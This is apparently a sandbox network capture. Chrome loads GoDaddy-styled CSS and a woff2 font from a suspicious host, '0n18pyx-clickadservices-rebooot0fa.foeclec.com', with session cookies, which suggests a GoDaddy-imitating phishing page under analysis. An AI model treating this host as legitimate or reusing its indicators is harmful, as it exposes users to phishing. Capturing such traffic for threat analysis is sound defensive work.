                                                                                                                                      2024-05-08 18:12:48 UTC734INData Raw: 33 37 62 62 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 67 64 73 68 65 72 70 61 27 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 73 72 63 3a 20 75 72 6c 28 27 2f 77 65 62 38 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 62 6f 6c 64 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 27 2f 77 65 62 38 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 62 6f 6c 64 2e 77 6f 66 66 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 31 30 46 46 46 46 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20
                                                                                                                                      Data Ascii: 37bb@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/web8/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family:
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 20 39 30 30 3b 73 72 63 3a 20 75 72 6c 28 27 2f 77 65 62 38 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 76 66 32 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 27 2f 77 65 62 38 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 76 66 32 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 2d 76 61 72 69 61 74 69 6f 6e 73 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 31 30 46 46 46 46 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 67 64 2d 73 61 67 65 27 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 73 72
                                                                                                                                      Data Ascii: ont-weight: 1 900;src: url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sage';font-weight: 700;sr
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 6d 20 2d 20 31 2e 35 65 6d 29 20 2f 20 32 29 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 67 61 70 3a 20 30 2e 35 65 6d 3b 0d 0a 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0d 0a 20 20 2d 2d 75 78 2d 62 75 74 74 6f 6e 2d 69 63 6f 6e 2d 6d 61 72 67 69 6e 3a 20 63 61 6c 63 28 28 76 61 72 28 2d 2d 75 78 2d 74 33 37 39 6f 76 2c 76 61 72 28 2d 2d 75 78 2d 6a 77 35 73 39 6a 2c 31 2e 35 29 29 20 2a 20 31 65 6d 20 2d 20 31 2e
                                                                                                                                      Data Ascii: m - 1.5em) / 2); padding: 0; text-decoration: var(--ux-1f7if5p,underline); -webkit-text-decoration: var(--ux-1f7if5p,underline); gap: 0.5em; cursor: pointer; --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 73 70 61 63 65 2e 75 78 2d 73 70 61 63 65 2d 2d 62 6c 6f 63 6b 3a 65 6d 70 74 79 20 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 0d 0a 20 20 62 6c 6f 63 6b 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 73 70 61 63 65 2e 75 78 2d 73 70 61 63 65 2d 2d 62 6c 6f 63 6b 3a 6e 6f 74 28 3a 65 6d 70 74 79 29 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 62 6c 6f 63 6b 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d
                                                                                                                                      Data Ascii: ding-size);}#sections_godaddy .ux-space.ux-space--block:empty { display: inline-flex; block-size: var(--uxSpace--padding-size);}#sections_godaddy .ux-space.ux-space--block:not(:empty) { padding-block: var(--uxSpace--padding-size);}
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 33 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 32 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 34 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 33 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 35 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d
                                                                                                                                      Data Ascii: -7s4p3v,1.125)); --uxText--fontSize3: calc(var(--uxText--fontSize2) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--fontSize4: calc(var(--uxText--fontSize3) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--fontSize5: calc(var(--uxText-
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 0a 20 20 63 6f 6c 6f 72 3a 20 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 0d 0a 20 20 66 69 6c 6c 3a 20 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 74 65 78 74 2d 69 6e 70 75 74 2d 73 68 65 6c 6c 20 2e 75 78 2d 74 65 78 74 2d 63 61 70 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 36 70 78 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 0d 0a 7d 0d 0a 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 66 69 65 6c 64 2d 66 72 61 6d 65 2e 75 78 2d 66 69 65 6c 64 2d 66 72 61 6d 65 2d 2d 69 6e 76 61 6c 69 64 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 44 42 31 38 30 32 20 21 69 6d 70 6f
                                                                                                                                      Data Ascii: color: currentColor; fill: currentColor;}#sections_godaddy .ux-text-input-shell .ux-text-caption { margin-top: 6px; font-size: 13px;}#sections_godaddy .ux-field-frame.ux-field-frame--invalid { border-color: #DB1802 !impo
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 73 72 2d 6f 6e 6c 79 20 7b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 77 69 64 74 68 3a 20 31 70 78 3b 0d 0a 20 20 68 65 69 67 68 74 3a 20 31 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 63 6c 69 70 3a 20 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 0d 0a 20 20 63 6c 69 70 3a 20 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 0d 0a 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 0d 0a 20 20 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30
                                                                                                                                      Data Ascii: #sections_godaddy .sr-only { position: absolute; width: 1px; height: 1px; padding: 0; overflow: hidden; -webkit-clip: rect(0,0,0,0); clip: rect(0,0,0,0); white-space: nowrap; -webkit-clip-path: inset(50%); clip-path: inset(50
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2e 30 39 33 37 35 72 65 6d 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 38 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 6f 6e 74 61 69 6e 65 72 3a 3a 61 66 74 65 72 20 7b 0d 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 64 69 73 70 6c 61 79
                                                                                                                                      Data Ascii: border-box; padding: 0; vertical-align: .09375rem;}#sections_godaddy .container { margin-left: auto; margin-right: auto; padding-left: 8px; padding-right: 8px;}#sections_godaddy .container::after { content: ""; display
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 75 78 2d 39 37 68 33 76 6c 2c 23 64 33 64 33 64 33 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 63 61 72 64 20 2e 63 61 72 64 2d 62 6c 6f 63 6b 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 2d 31 73 62 66 69 67 38 2c 2e 32 35 72 65 6d 29 20 2a 20 35 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 66 6f 6e 74 2d 70 72 69 6d 61 72 79 2d 62 6f 6c 64 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 61 72 28 2d 2d 75 78 2d 31 30 36 37 70 68 39 2c 73 61 6e 73 2d 73 65 72 69 66 29 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 65 72 3b 0d 0a 7d 0d 0a 0d
                                                                                                                                      Data Ascii: er: 1px solid var(--ux-97h3vl,#d3d3d3);}#sections_godaddy .ux-card .card-block { padding: calc(var(--ux-1sbfig8,.25rem) * 5);}#sections_godaddy .font-primary-bold { font-family: var(--ux-1067ph9,sans-serif); font-weight: bolder;}
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 37 6a 75 30 68 2c 76 61 72 28 2d 2d 75 78 2d 39 71 70 66 36 63 2c 23 30 30 66 29 29 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 75 71 34 39 70 67 2c 76 61 72 28 2d 2d 75 78 2d 68 36 65 37 63 31 2c 23 66 66 66 29 29 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 34 68 76 6f 76 6e 2c 76 61 72 28 2d 2d 75 78 2d 31 78 6c 69 75 68 69 2c 74 72 61 6e 73 70 61 72 65 6e 74 29 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 62 75 74 74 6f 6e 2e 75 78 2d 62 75 74 74 6f 6e 2d 70 72 69 6d 61 72 79 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 63 6f
                                                                                                                                      Data Ascii: 7ju0h,var(--ux-9qpf6c,#00f)); color: var(--ux-uq49pg,var(--ux-h6e7c1,#fff)); border-color: var(--ux-4hvovn,var(--ux-1xliuhi,transparent));}#sections_godaddy .ux-button.ux-button-primary { color: #fff; background-color: #000; border-co


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      35192.168.2.1649756104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:48 UTC1530OUTGET /rsDaFFHlAZCVklAUguHuyzvbqKJluv31 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: font
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:49 UTC627INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:49 GMT
                                                                                                                                      Content-Type: font/woff2
                                                                                                                                      Content-Length: 28000
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="rsDaFFHlAZCVklAUguHuyzvbqKJluv31"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jtWicR%2B4qx2fEySk2d6dsbgijragN6eg03vqL7x9jaKFrek6MXilwFsZe7jjy2Z675tot5sG8NSZoBQi9Z37mcvTABmF%2Bi66lqGG%2FKipQH1w5MzVEUHOmcM7TPTaZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b8a5f0b767b-SEA
                                                                                                                                      2024-05-08 18:12:49 UTC742INData Raw: 77 4f 46 32 00 01 00 00 00 00 6d 60 00 10 00 00 00 01 24 08 00 00 6c fd 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 9d 36 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 bb 24 82 9c 7f 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 03 07 97 7b 0c 81 0d 5b 09 10 71 05 6b b7 5d 5d 4f 88 db 06 10 73 b3 fd a9 7c 99 02 6e 8c 9b c7 21 18 d6 5b 3c 3b 10 83 ee e0 50 26 a6 cf 67 ff ff ff bf 21 a9 c8 98 49 27 69 b7 0d 51 01 44 50 d5 df 9f c4 1e 39 02 92 4a a0 06 b7 80 17 c1 39 47 eb 95 e9 98 51 31 28 8b f2 29 4a 6e c6 19 d5 d4 c5 d4 38 59 f3 d2 1b f9 1a 98 29 4a ce 46 0e 63 20 41 96 af 37 6b ab 76 b3 8b e9 32 3d a1 5a ee 6e fa 34 60 12 ed 81 a0 c0 7e 4e 6c a4 81 ef 34 3b aa 91 07 53 f6 6c 7b 77 c7 c7 3a ae 23 d5 ee aa 3d 21 bc 20
                                                                                                                                      Data Ascii: wOF2m`$lB6`<<b$6$x> {[qk]]Os|n![<;P&g!I'iQDP9J9GQ1()Jn8Y)JFc A7kv2=Zn4`~Nl4;Sl{w:#=!
                                                                                                                                      2024-05-08 18:12:49 UTC1369INData Raw: 78 fd fb cf db e5 9f fb 06 4b 68 b0 50 00 7c 22 4d 93 ae 4a 51 a6 00 02 1a e0 df 3f 60 01 fc 53 40 7b df ed 6f 97 f6 52 6a 43 45 a1 71 78 8f 70 92 21 28 57 69 9f a4 1b eb 64 59 b5 25 ff 2f 72 f2 23 13 70 04 e7 43 20 15 c4 93 e2 e9 00 00 81 82 83 f3 72 1e 6f 34 50 f1 7d e4 e6 7f 33 58 92 99 5d 88 fc f3 a2 d4 ae 01 36 f2 9e 27 7e 26 b0 d3 c0 5d b7 b4 a7 2a 79 09 f4 8f b6 ff 59 51 82 a7 39 e1 22 76 b7 c3 17 cb 33 f0 af 90 a0 d9 6f 45 4d 51 6f 57 4d 16 57 60 cc 85 de 1f 9a 8a 01 13 c4 07 db cc a4 0e 94 94 10 82 59 08 56 81 8a 4f 32 11 7f ee f1 f8 f4 6c 83 02 c7 ac 9d 70 01 31 87 f4 42 a5 c2 bf 46 6e 0e 7f 6f 10 3c d0 ab a8 2c 43 8f f7 0f fd 97 f8 5e c0 59 e6 43 00 b6 fe 57 ae e9 b6 74 58 e2 11 7c a8 60 d2 a6 bc 97 35 3a f7 59 64 40 5d e5 12 6a 18 bb 24 b6 dc
                                                                                                                                      Data Ascii: xKhP|"MJQ?`S@{oRjCEqxp!(WidY%/r#pC ro4P}3X]6'~&]*yYQ9"v3oEMQoWMW`YVO2lp1BFno<,C^YCWtX|`5:Yd@]j$
                                                                                                                                      2024-05-08 18:12:49 UTC1369INData Raw: 01 24 1a 4e 4a ad 68 65 68 64 9a cf 32 9d 4d e7 8a 0a 96 48 c8 6c 22 d8 b5 a2 1b ed 62 bc b1 36 52 21 05 95 14 c7 81 94 35 dc bc 61 7e c1 b4 7a 90 11 b4 ca 1d 10 b9 22 0a 08 40 c0 9b 31 90 dc 27 05 17 40 40 05 00 50 85 55 b6 46 4e 76 17 a1 cf f8 91 28 18 bc 86 dd 28 8a 0d 6e 1d 26 6e 7d 95 e8 90 58 8c 91 02 38 4a a0 94 87 e5 5a 50 e2 4c bc d0 25 06 2b 80 8c c4 05 99 9c 71 86 d8 29 ca 83 fb a6 88 8f df 77 45 f5 08 aa 72 b3 dd 04 90 49 e7 01 a0 73 40 15 14 14 29 cb f1 82 58 04 82 31 5a 02 29 dc 92 31 91 53 51 02 a6 fa 29 2a 80 d8 45 b8 e5 49 0f 90 d8 00 4a f9 09 a8 6e 75 4c 81 89 2f 00 77 7d b0 d2 75 b4 ea 9a ae 67 98 3e 3c 14 be 13 55 48 55 f9 1e 60 2e ed fc 69 cf da b5 42 06 20 96 20 07 60 a8 05 c2 4c f9 e3 9b e0 38 ab d1 83 9b 3a 8b 85 5e ca a3 dc 75 85
                                                                                                                                      Data Ascii: $NJhehd2MHl"b6R!5a~z"@1'@@PUFNv((n&n}X8JZPL%+q)wErIs@)X1Z)1SQ)*EIJnuL/w}ug><UHU`.iB `L8:^u
                                                                                                                                      2024-05-08 18:12:49 UTC1369INData Raw: df 29 84 2f 8d 21 bc 9b c0 9e 39 aa 76 68 dd 8c 5b 2f 6b 9f 1d b3 c9 cf 85 80 7e 4d 7d 1c 44 b5 56 8e d5 c6 7d 25 c4 02 3b 1b 15 6b 50 8d 7e cb ba 24 26 a5 bb 63 d1 11 53 27 2b df 09 8c 31 2c f4 05 2d 8e 9d 58 08 42 45 de 45 e3 4e a2 83 07 5d cd 4a 33 e0 b5 97 e1 ae c5 ad d6 f0 84 e2 b0 3c c6 03 e7 41 3f 7a 78 70 cc 8c 76 2e 02 cf b0 85 b1 bb 8b 6f c8 80 02 d5 9e 4a 0a a0 e3 4b b7 9b 9f c2 a6 10 af 98 9a 67 7a 8f e4 ad 45 d1 58 cc 2e ad 55 97 e2 39 c3 32 ea cd 24 ff 27 7b 73 5b b5 87 25 e3 73 aa 4d 39 f0 18 1c e6 1b 82 af d3 ba d2 3c 76 ce 79 bf b0 50 9d c3 58 69 34 3f af 43 4d 37 3b 6c 0d ce 6f 77 95 ec 53 d8 54 86 b1 6d 91 2a 74 76 a0 4a b1 bf 18 8f 94 7e cf d7 cf f4 a0 5e 55 14 0e 79 da 72 32 2d 41 57 0e 69 b4 3f 77 7c c5 7f e3 8f 3f 86 9b ff 3b dd 9e
                                                                                                                                      Data Ascii: )/!9vh[/k~M}DV}%;kP~$&cS'+1,-XBEEN]J3<A?zxpv.oJKgzEX.U92$'{s[%sM9<vyPXi4?CM7;lowSTm*tvJ~^Uyr2-AWi?w|?;
                                                                                                                                      2024-05-08 18:12:49 UTC1369INData Raw: 09 ae 2d cf 99 80 54 9b eb 9f 00 6a 07 4d d1 ff 28 8b fc 6c d2 51 9d 0e 83 9d 22 5c e7 48 fc 92 05 99 2d cc c3 68 90 eb c1 5c 1c b1 24 18 71 2e 08 a3 6c db c7 5b cb 58 47 63 ba 7c 3d 91 9d bf 11 44 11 fd a1 6b 70 7b ee c6 de 50 49 44 db ef aa dc 2c 43 d6 77 cc 1f aa ac 43 7b cb 87 68 e6 c2 24 ef 71 39 38 ea ca 50 a1 dd a1 b9 16 af e7 5b 36 1a a3 68 7d b7 d1 9b 19 9e 1c 5e da b3 75 d6 19 24 b3 60 d0 95 e7 b7 0d b0 2c 6e a1 9e a0 81 cf 5d 0e 63 53 f1 46 00 2f bb fe 1f 70 a5 9e 58 1d 8b e9 75 3b 36 ba 42 6c 18 29 19 db c5 7e 29 4e 35 47 ef 03 d3 11 c4 6b cc 5c b2 8c 98 87 f1 b4 13 7a 4a eb 68 53 1d d1 cd 11 38 50 f8 a2 27 ad a6 67 78 4b 59 17 a6 07 71 e0 18 1c 10 0b 1d 4d 5f a1 68 c3 41 66 ce 84 77 dd 8c a7 e9 0d 2d 3e d3 90 90 f7 e2 a7 6d b2 50 7a fd 83 9e
                                                                                                                                      Data Ascii: -TjM(lQ"\H-h\$q.l[XGc|=Dkp{PID,CwC{h$q98P[6h}^u$`,n]cSF/pXu;6Bl)~)N5Gk\zJhS8P'gxKYqM_hAfw->mPz
                                                                                                                                      2024-05-08 18:12:49 UTC1369INData Raw: 95 be 39 e2 c8 e7 ed 03 c0 64 f5 67 15 d4 4b a0 1c 83 ae 60 ec ae 01 51 24 52 a8 17 ec d7 e5 02 86 d6 f7 93 a3 02 4c fd 08 2e 8c 51 67 00 58 f0 b7 dd 29 00 ab bc b1 63 95 3a c0 e5 1b 8e 84 eb 18 37 bb ef 5b d7 78 fc 7d eb 19 6f bf 0f 7d 63 b3 00 00 20 24 28 4c 1c 20 c3 ee 31 20 a1 ae 01 e7 67 65 60 3c ab 00 96 58 09 ac 4a bb 44 03 43 dd 38 d9 f3 a2 2b cd a5 b3 5c 2d 6b ac c0 93 b0 6f fd 3a 04 fd 22 2e c2 be 55 37 a0 58 93 20 c4 cf 40 e9 fe 01 ff a3 bf 02 54 df f1 8b 37 d2 18 b9 b2 03 8d 66 21 96 60 25 57 88 a6 3f f3 e8 ee 9c 1a f8 ec 5f 95 a3 57 af 34 dc c0 f6 14 72 54 dc 81 7e 73 3e 7a 37 c6 fa dd 84 b2 82 b7 a0 7a 70 7b fd bf 42 d0 4f eb 28 a4 30 55 01 23 24 61 8a 97 2a 35 0e da f7 f4 cd 10 22 2c 42 aa 28 31 81 9a 39 89 24 32 0a 29 54 d2 64 c9 91 a7 40
                                                                                                                                      Data Ascii: 9dgK`Q$RL.QgX)c:7[x}o}c $(L 1 ge`<XJDC8+\-ko:".U7X @T7f!`%W?_W4rT~s>z7zp{BO(0U#$a*5",B(19$2)Td@
                                                                                                                                      2024-05-08 18:12:49 UTC1369INData Raw: dc 33 af 7c b3 6d 8b 0c 04 3f 40 60 4f 3c e0 20 be 10 e4 01 3d a8 7d a6 28 9b 38 a1 c5 64 57 74 3d ec 7f 7d 08 26 bd 16 95 ea 5b 16 b0 5d d2 de b5 6e b9 e3 ae 7b 6e 6b 72 28 f0 1d 1b 15 eb 74 db 4d 9d ae bb 2f 4e a5 f6 c0 61 4c 1d c7 6e b4 0c 4d bd 43 5d 9c ee 65 37 b8 ea ff 8d 8b ca 96 bb eb 56 d5 5a 4d 90 d4 e4 b5 76 87 e4 8d 45 7d 9a 48 7b 15 e0 5a c2 73 b4 ee 2e be 04 f8 b4 7e c7 da 3d f4 f5 ed 7a 5a 3f ac 25 b2 36 32 5a f6 5f c0 4a 1d ff a4 c9 f4 bf f6 4f f8 3a c0 5c 92 fa 51 9c be bf bc 3e 88 6f 28 0a 9c e4 45 91 5e ff 83 f9 e0 35 e2 f6 53 a6 99 64 a7 9e 68 3c 39 c1 74 f8 af 2d f4 6b e8 e9 d0 0e 42 8c e0 02 a8 36 9f 40 50 6b 72 08 44 df 89 c3 a0 23 f1 be 82 8f 9f a6 6c c8 ea e2 70 81 d8 e7 08 a7 65 e7 73 8e 16 c3 78 1e d8 5f dd 27 48 e7 20 ba 7f 9a
